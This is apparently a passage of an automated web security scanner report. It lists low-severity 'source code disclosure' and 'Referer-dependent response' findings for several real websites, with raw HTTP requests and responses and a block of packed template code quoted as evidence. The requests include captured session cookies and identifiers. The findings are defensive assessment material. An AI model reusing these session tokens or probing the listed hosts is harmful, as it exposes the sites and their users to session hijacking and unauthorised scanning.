<1j 1F="<%= 1t %>" 1a="ac:2Q; 1d:oU; h7-1d:be; 2B-5t:2H; 1W-6f:1I; 2v:<%= 1Q.1W %>; 2B-5R:ai;"><%= ad.1W %></1j>    <1j 1F="<%= 1t %>" 1a="<%= 1Z %> 2N:2H; 1p:<%= 4F ? 9 : 0 %>px; 1h:p3; 1d:6z; ac:2Q; 2B-5t:2H; 2B-5R:ai; 1W-6f:2W; 2v:<%= 1Q.f9 %>;" 6x="<%= ad.cC %>"><%= ad.cC %></1j>    <1j 1F="<%= 1t %> <%= id %>6v <%= id %>pb" 1a="<%= 1Z %> 2N:bn; 2I:0; 1h:pd; 1d:pe; 4I-1o:5u; 1H-2m:2m-x !1O; 32:1S 3P <%= 1Q.fd %>; <%= 33.7Y(\\\'5u\\\') %> 1W-6i:5o; 2v:<%= 1Q.fg %>; 2B-5t:2H; 3i:3v; 2B-5R:ai;" 3X="o.1b.1u.1a.ee(1k, \\\'cY\\\');" 3U="o.1b.1u.1a.hk(1k, \\\'cY\\\');">
...[SNIP]...
<1j                 id="<%= id %>6B<%= 4r %>" 1F="<%= 1t %>" 1a="1d:<%= 1q.1d %>px; 1w:7t; 1A:<%= 1A %>;">
...[SNIP]...
<1j                 id="<%= id %>6B<%= 4r %>" 1F="<%= 1t %>" 1a="1A:<%= 1A %>;">    <1j 1t="<%= 1t %>" 1a="1h:<%= 1q.1h %>px; 1d:<%= 1q.1d %>px;">        <2R id="ao<%= 4r %>" 2h="ao<%= 4r %>" 3C="<%= 1L.8w %>" 1h="<%= 1q.1h %>" 1d="<%= 1q.1d %>" cM="0" cN="no">
...[SNIP]...
<5K id="<%= id %>hy<%= 4r %>" 5A="8X" 3B="2J://<%= 1L.8i %>/5B.5D" 4J="ao<%= 4r %>" 1a="1A:1I;">        <3r 1K="2Q" 2h="5B" 2w="<%= 3W(29.2j(\\\'\\\').hI().1s(\\\'\\\')) %>" />        <3r 1K="2Q" 2h="6q" 2w="<%= 1L.6L %>" />        <3r 1K="2Q" 2h="4p" 2w="<%= 1L.6R %>" />        <3r 1K="2Q" 2h="4D" 2w="<%= 1L.4i %>" />
...[SNIP]...
<1j id="<%= id %>" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:<%= 1x.2P.1o %>px; 1p:<%= 1x.2P.1p %>px; 1h:<%= 1h+12 %>px; 1d:<%= 1d + (4F ? 58 : 54) %>px; z-3k:<%= 3F+3 %>;">    <1j id="<%= id %>er" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:<%= oY == \\\'T\\\' ? 0 : \\\'2H\\\' %>; 1p:0; 1h:<%= 1h+10 %>px; 1d:<%= 1d+39 %>px; 32:1S 3P <%= 1Q.gg %>; <%= 33.7Y(\\\'5s\\\') %> <% if (33.4E.8H()){ %>1H-2v:<%= 1Q.9s %>; <%= 33.aA(oY == \\\'T\\\' ? \\\'2N\\\' : \\\'1o\\\', (oY == \\\'T\\\' && 27(b.4K) >= 8N) ? 1d+19 : 22, 1Q.gm, 1Q.gn) %><% } 1f { %>1H:1C(<%= 2T %>3a-ca-bg.<%= 5P %>) 2m-x 2z 0 <%= oY == \\\'T\\\' ? 1d+19+\\\'px\\\' : \\\'-81\\\' %> <%= 1Q.9s %>;<% } %> <%= 33.7M(\\\'0 0 cp 0 #bu\\\') %>" 3X="o.7n(\\\'<%= 1x.id %>\\\').cr(1k, \\\'<%= 1x.id %>\\\');" 3U="o.7n(\\\'<%= 1x.id %>\\\').bI(1k, \\\'<%= 1x.id %>\\\');">        <1j id="<%= id %>dK" 1F="<%= 1t %>" 1a="1h: 2X%; 1d: o6; <%= 1Z %> <%= oY == \\\'T\\\' ? \\\'2N:0;\\\' : \\\'1o: 0;\\\' %> 1p: 0; z-3k: <%= 3F+4 %>;">            <a id="<%= id %>o8" 1F="<%= 1t %> <% if (!69.1C){ %><%= id %>6v<% } %>" 4f="<%= 69.bo %>" 4J="8S" 1a="<%= 1Z %> 1A: 35; 1o: 5S; 1p: 6Z; 1h:<%= 69.1h %>px; 1d:<%= 69.1d %>px; 3i: 3v; <% if (69.1C){ %>1H:1C(<%= 69.1C %>) no-2m 2z 0 0 2e !1O;<% } %>
...[SNIP]...
</a>            <% if (1i 1L.52 == "3M"){ %> <a 1a="1w: 4c; 1o: 56; 2I: gZ; 1d: be; 2B-5R: 86; 2B-ag: cH ah,9b,94-99; 2B-5t: 6Z; 1W-6f: 2W; 2v: #ok;" 1F="9m" 4f="2J://8l.6s.71/2g" 4J="8S">
...[SNIP]...
</45> <% }/*oQ*/ %> <1j id="<%= id %>oR" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o: 7k; 2I: <%= (1i 1L.52 != "3M") ? "gZ" : "bl" %>; 1d: be; 2B-5R: 86; 2B-ag:cH ah, 9b, 94-99; 2v:<%= 1Q.cP %>; 2B-5t: 7k;"><%= 1q.2g[1x.2L].cP || \\\'py\\\' %></1j>            <% if (33.4E.8x()){ %>            <a id="<%= id %>hO" 1F="<%= 1t %> <%= id %>6v" 4f="<%= bj %>" 4J="8S" 1a="<%= 1Z %> 1o:56; 2I:hR; 1h:2H; 1d:2H; 1A:35; 1H-1w:0 -ay !1O; 32:1S 3P <%= 1Q.8r %>; <%= 33.7Y(\\\'56\\\') %> <%= 33.7M(\\\'0 -1S 1S 0 \\\' + 1Q.cU) %>" 3X="1k.1a.5h=\\\'<%= 1Q.cV %>\\\';" 3U="1k.1a.5h = \\\'<%= 1Q.8r %>\\\';"></a>            <1j id="<%= id %>aR" 1F="<%= 1t %> <%= id %>6v" 1a="<%= 1Z %> 1o:56; 2I:5s; 1h:2H; 1d:2H; 3i:3v; 1H-1w:-2H -ay !1O; 32:1S 3P <%= 1Q.8r %>; <%= 33.7Y(\\\'56\\\') %> <%= 33.7M(\\\'0 -1S 1S 0 \\\' + 1Q.cU) %>" 44="o.1y.9i(2a, \\\'<%= 1x.id %>\\\')" 3X="1k.1a.5h=\\\'<%= 1Q.cV %>\\\';" 3U="1k.1a.5h = \\\'<%= 1Q.8r %>\\\';"></1j>            <% } 1f { %>            <a id="<%= id %>hO" 1F="<%= 1t %>" 4f="<%= bj %>" 4J="8S" 1a="<%= 1Z %> 1o: 6t; 2I: hR; 1h: 6z; 1d: 6z; 1A: 35; 1H: 1C(<%= 2T %>aD-d7.<%= 5P %>) no-2m 2z 0 0 2e; 3i: 3v;" 3X="1k.1a.2G=\\\'0 -6z\\\';" 3U="1k.1a.2G = \\\'0 0\\\';">
...[SNIP]...
<1j 1F="<%= 1t %> <%= id %>6v" 1a="<%= 1Z %> 1o:1N; 1p:1N; 1h:2H; 1d:2H; 1H-1w:0 -ay !1O;">
...[SNIP]...
<1j id="<%= id %>aR" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o: 6t; 2I: 5s; 1h: 6z; 1d: 6z; 3i:3v; 1H: 1C(<%= 2T %>aD-d7.<%= 5P %>) no-2m 2z 0 0 2e;" 44="o.1y.9i(2a, \\\'<%= 1x.id %>\\\')" 3X="1k.1a.2G=\\\'0 -6z\\\';" 3U="1k.1a.2G = \\\'0 0\\\';">
...[SNIP]...
<1j 1F="<%= 1t %> <%= id %>6v" 1a="<%= 1Z %> 1o:1N; 1p:1N; 1h:2H; 1d:2H; 1H-1w:-2H -ay !1O;">
...[SNIP]...
<1j id="<%= id %>7d" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:<%= oY == \\\'T\\\' ? 4 : 34 %>px; 1p:5b; 1h:<%= 1h %>px; 1d:<%= 1d %>px; 2v:<%= 1Q.1W %>; 3i: 3v; 32:1S 3P <%= 1Q.dk %>; <% if (33.4E.8H()){ %><%= 33.aA(oY == \\\'T\\\' ? \\\'2N\\\' : \\\'1o\\\', (oY == \\\'T\\\' && 27(b.4K) >= 8N) ? 1d-41 : 41, 1Q.dv, 1Q.dy) %><% } 1f { %>1H:1C(<%= 2T %>3a-1M-bg.<%= 5P %>) 2m-x 2z 0 <%= oY == \\\'T\\\' ? 1d-41 : -41 %>px 2e;<% } %>" 44="o.6X(2a, \\\'<%= 1x.id %>\\\');">            <%= il.bN(1x, 1q) %>        </1j>    </1j>    <% if (!1x.2k){ %>    <1j id="<%= id %>iR" 1F="<%= 1t %> <%= id %>6v" 1a="<%= 1Z %> 1h: 98; 1d: 98; z-3k: <%= 3F+5 %>; 1H-1w:<%= oY == \\\'T\\\' ? \\\'-98 -dJ\\\' : \\\'0 -dJ\\\' %> !1O; 1o:<%= oY == \\\'T\\\' ? 1d+39 : 0 %>px; <%= oX == \\\'L\\\' ? \\\'2I: 24\\\' : \\\'1p: 24\\\' %>px;"></1j>    <% } %></1j><% if (!33.4E.4h() && (!b.1G || 3d(b.1G) >= 7)){ %><1j id="<%= id %>c2" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:<%= 1x.2P.1o - (oY == \\\'T\\\' ? 37 : 24) %>px; 1p:<%= 1x.2P.1p-37 %>px; 1h:<%= 1h+10+74 %>px; 1d:<%= 1d+39+74 %>px; z-3k:<%= 3F+1 %>;" <% if (b.4j && 3d(b.4j) < 3.5){ %> 3X="o.7n(\\\'<%= 1x.id %>\\\').cr(1k, \\\'<%= 1x.id %>\\\');" 3U="o.7n(\\\'<%= 1x.id %>\\\').bI(1k, \\\'<%= 1x.id %>\\\');"<% } %>
...[SNIP]...
<1j id="<%= id %>jP" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:0; 1p:0; 1h:4t; 1d:91; 1H:1C(<%= 2T %>3x.2V) no-2m 2z 0 -af 2e;">
...[SNIP]...
<1j id="<%= id %>jU" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:0; 1p:4t; 1h:<%= 1h+10-60 %>px; 1d:6I; 1H:1C(<%= 2T %>3x-h.2V) 2m-x 2z 0 0 2e;">
...[SNIP]...
<1j id="<%= id %>jY" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:0; 2I:0; 1h:ax; 1d:91; 1H:1C(<%= 2T %>3x.2V) no-2m 2z -4t -af 2e;">
...[SNIP]...
<1j id="<%= id %>k4" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:91; 1p:0; 1h:6I; 1d:<%= 1d+39-61 %>px; 1H:1C(<%= 2T %>3x-v.2V) 2m-y 2z 0 0 2e;">
...[SNIP]...
<1j id="<%= id %>k7" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:91; 2I:0; 1h:6I; 1d:<%= 1d+39-61 %>px; 1H:1C(<%= 2T %>3x-v.2V) 2m-y 2z -9n 0 2e;">
...[SNIP]...
<1j id="<%= id %>kl" 1F="<%= 1t %>" 1a="<%= 1Z %> 2N:0; 1p:0; 1h:4t; 1d:ax; 1H:1C(<%= 2T %>3x.2V) no-2m 2z 0 -a5 2e;">
...[SNIP]...
<1j id="<%= id %>ko" 1F="<%= 1t %>" 1a="<%= 1Z %> 2N:0; 1p:4t; 1h:<%= 1h+10-60 %>px; 1d:6I; 1H:1C(<%= 2T %>3x-h.2V) 2m-x 2z 0 -9n 2e;">
...[SNIP]...
<1j id="<%= id %>kx" 1F="<%= 1t %>" 1a="<%= 1Z %> 2N:0; 2I:0; 1h:ax; 1d:ax; 1H:1C(<%= 2T %>3x.2V) no-2m 2z -4t -a5 2e;">
...[SNIP]...
<1j id="<%= id %>ho" 1F="<%= 1t %>" 1a="<%= 1Z %> 1o:<%= 7T.1o %>px; 1p:<%= 7T.1p %>px; 1h:<%= 7T.1h %>px; 1d:<%= 7T.1d %>px; z-3k:<%= 3F+6 %>; 3i:3v;" 3X="o.8p(2a, \\\'<%= 1x.id %>\\\');" 3U="o.6T(\\\'<%= 1x.id %>\\\');" 44="o.6X(2a, \\\'<%= 1x.id %>\\\')">
...[SNIP]...
<1j                id=\\"<%= id %>\\" 1F=\\"<%= 1t %>\\" 1a=\\"<%= 1Z %> 1h:<%= 1h+11 %>px; 1d:<%= 1d+22 %>px; 1o:<%= 1x.2P.1o %>px; 1p:<%= 1x.2P.1p %>px; z-3k:<%= 3F+3 %>;\\"                3X=\\"o.aE(\'<%= 1x.id %>\')\\" 3U=\\"o.6T(\'<%= 1x.id %>\')\\">                    <% if (!1x.2k){ %>                    <1j id=\\"<%= id %>dK\\" 1F=\\"<%= 1t %>\\" 1a=\\"1h:2X%; 1d:81; <%= 1Z %> 1p:0; z-3k:<%= 3F+4 %>; <%= (oY == \'T\') ? \'2N:0;\' : \'1o:0;\' %>\\" >                        <1j id=\\"<%= id %>aR\\" 1F=\\"<%= 1t %>\\" 1a=\\"<%= 1Z %> 1h:81; 1d:81; 1H:2e 1C(<%= 2T + (4F ? \'x.5C\' : \'x.2V\') %>) no-2m 2z 0 0; 3i:3v; 1o:<%= (oY == \'T\') ? \'1N\' : 0 %>; <%= (oX == \'L\') ? \'2I:0\' : \'1p:0\' %>;\\" 44=\\"o.1y.9i(2a, \'<%= 1x.id %>\')\\">
...[SNIP]...
<1j id=\\"<%= id %>er\\" 1F=\\"<%= 1t %>\\" 1a=\\"<%= 1Z%> 1h:<%= 1h %>px; 1d:<%= 1d %>px; lf:<%= 3F+3 %>; 1o:<%= (oY == \'T\') ? 0 : \'81\' %>; <%= (oX == \'L\') ? \'1p:0\' : \'1p:bn;\' %>; \\">                        <1j id=\\"<%= id %>7d\\" 1F=\\"<%= 1t %>\\" 1a=\\"<%= 1Z %> 1o:0; 1p:0; 1h:<%= 1h %>px; 1d:<%= 1d %>px; 3i:3v; 2v:<%= 7y %>;\\" 44=\\"o.6X(2a, \'<%= 1x.id %>\')\\">                            <%= o.bN(1x, 1q) %>                        </1j>
...[SNIP]...

14.4. http://www.enstarllc.com/v/js/ncBwHlpr.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.enstarllc.com
Path:   /v/js/ncBwHlpr.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /v/js/ncBwHlpr.js HTTP/1.1
Host: www.enstarllc.com
Proxy-Connection: keep-alive
Referer: http://www.enstarllc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 9602-query=; 9602%2Duserid=%2D810260; 9602%2Dreferer=http%3A%2F%2Finfo%2Emailtraq%2Ecom%2Fwac; ASPSESSIONIDQQSDCQTS=DACHPKFBPIPGAFNCALEEADDE

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Aug 2011 13:23:48 GMT
Accept-Ranges: bytes
ETag: "4851f367ce55cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:50:08 GMT
Content-Length: 65835

var ncMenus={LinkTypeNormal:0,LinkTypeHeading1:1,LinkTypeHeading2:2,GetLinkCssSelector:function(p_lZoneId, p_lLinkType, p_bSelected){var sTemp='.LO';switch(p_lLinkType){case ncMenus.LinkTypeNormal:sTe
...[SNIP]...
<![CDATA["+pNode.nodeValue+"]]>"; break; case 7: xml="<?"+pNode.nodevalue+"?>"; break; case 8: xml="<!--"+pNode.nodevalue+"-->
...[SNIP]...

14.5. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ibm.com
Path:   /developerworks/dwtagg/css/h3/dogear.css

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /developerworks/dwtagg/css/h3/dogear.css HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-142.ibm.com/software/products/us/en/search%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:01 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Last-Modified: Fri, 06 Mar 2009 20:17:56 GMT
ETag: "3f2b7-1e9a-faf42500"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7834
Content-Type: text/css

<%@ page contentType="text/css"%>
/* Copyright IBM Corp. 2006, 2008 All Rights Reserved. */

<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
<%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %>
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %>

/** Bookmarks styles **/

/** Bug Fixes */
#lotusColLeft .lotusSection input.lotusText, .lotusColLeft .lotusSection input.lotusText{margin-left:0px;}
.lotusHelp .lotusInfoBox h3{height:auto;}

...[SNIP]...

14.6. http://www.mailtraq.com/v/js/ncBwHlpr.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.mailtraq.com
Path:   /v/js/ncBwHlpr.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /v/js/ncBwHlpr.js HTTP/1.1
Host: www.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://www.mailtraq.com/30day
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 6464-query=; 6464%2Duserid=%2D3712022; 6464%2Dformreferer=http%3A%2F%2Finfo%2Emailtraq%2Ecom%2Fimap; 6464%2Dreferer=http%3A%2F%2Finfo%2Emailtraq%2Ecom%2Fimap; ASPSESSIONIDCABBRRRB=HDELLOMBKBMHLAMNFFECFFPD

Response

HTTP/1.1 200 OK
Content-Length: 65835
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Aug 2011 13:23:46 GMT
Accept-Ranges: bytes
ETag: "09d9b66ce55cc1:45f"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:49:48 GMT

var ncMenus={LinkTypeNormal:0,LinkTypeHeading1:1,LinkTypeHeading2:2,GetLinkCssSelector:function(p_lZoneId, p_lLinkType, p_bSelected){var sTemp='.LO';switch(p_lLinkType){case ncMenus.LinkTypeNormal:sTe
...[SNIP]...
<![CDATA["+pNode.nodeValue+"]]>"; break; case 7: xml="<?"+pNode.nodevalue+"?>"; break; case 8: xml="<!--"+pNode.nodevalue+"-->
...[SNIP]...

14.7. http://www.ted.com/js/library.min.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ted.com
Path:   /js/library.min.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/library.min.js?1316119359 HTTP/1.1
Host: www.ted.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ted.com/webcast/archive/event/ibmwatson
Cookie: symfony=6rh1uq799n643l7plr6irjcis1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:54:13 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 15 Sep 2011 20:41:52 GMT
Connection: keep-alive
Expires: Sun, 16 Oct 2011 19:54:13 GMT
Cache-Control: max-age=2592000
Content-Length: 254325

var sponsor_popover={_init:function(){this.element.height(this._getData("adSpace_height"));this.payload=this._getData("payload");this.setup_img();this.setup_tracking();if(this.payload.video.length){th
...[SNIP]...
<h;j++){f.call(l,j)}};ae.mixin=function(b){ac(ae.functions(b),function(f){k(f,ae[f]=b[f])})};var e=0;ae.uniqueId=function(h){var f=e++;return h?h+f:f};ae.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};ae.template=function(b,h){var f=ae.templateSettings;f="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+b.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(f.in
...[SNIP]...

15. Referer-dependent response  previous  next
There are 13 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



15.1. http://adnxs.revsci.net/imp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adnxs.revsci.net
Path:   /imp

Request 1

GET /imp?Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:17 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:17 GMT
Content-Length: 390

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1576960469%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F%26u%3Dhttp%3A%2F%2Fwww.tmz.com%2F"></scr'+'ipt>');

Request 2

GET /imp?Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:39 GMT
Content-Length: 327

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1576960469%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F"></scr'+'ipt>');

15.2. http://c.brightcove.com/services/viewer/federated_f9  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?isVid=1 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/national/?type=rem911
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Fri, 16 Sep 2011 14:04:39 EDT
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110916.1045/BrightcoveBootloader.swf?purl=http%3A%2F%2Fbostonherald.com%2Fnews%2Fnational%2F%3Ftype%3Drem911&isVid=1
Content-Length: 0
Date: Sat, 17 Sep 2011 01:32:30 GMT
Server:

Request 2

GET /services/viewer/federated_f9?isVid=1 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Fri, 16 Sep 2011 18:04:39 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110916.1045/BrightcoveBootloader.swf?isVid=1
Content-Length: 0
Date: Sat, 17 Sep 2011 01:32:53 GMT
Server:


15.3. http://cpanel.app9.hubspot.com/Inactive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cpanel.app9.hubspot.com
Path:   /Inactive.aspx

Request 1

GET /Inactive.aspx?type=18 HTTP/1.1
Host: cpanel.app9.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.cpanel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=R27wZXuTzQEkAAAAMjg1YjZkOWQtZGIxZS00MTZiLWJlYWItYmIwMmYzMTA1ZGI30; hubspotutk=93ed7895-0288-4720-bfdc-c10d00f88606; HUBSPOT20080=3977319596.0.0000

Response 1

HTTP/1.1 302 Found
Date: Fri, 16 Sep 2011 19:50:50 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://signup.hubspot.com/setup/billing?portalId=96145&redirectToNewPortalDomain=http%3a%2f%2fwww.cpanel.net%2f
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 233

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=96145&amp;redirectToNewPortalDomain=http%3a%2f%2fwww.cpanel.net%2f">here</a>.</h2>
</body></html>

Request 2

GET /Inactive.aspx?type=18 HTTP/1.1
Host: cpanel.app9.hubspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=R27wZXuTzQEkAAAAMjg1YjZkOWQtZGIxZS00MTZiLWJlYWItYmIwMmYzMTA1ZGI30; hubspotutk=93ed7895-0288-4720-bfdc-c10d00f88606; HUBSPOT20080=3977319596.0.0000

Response 2

HTTP/1.1 302 Found
Date: Fri, 16 Sep 2011 19:50:52 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
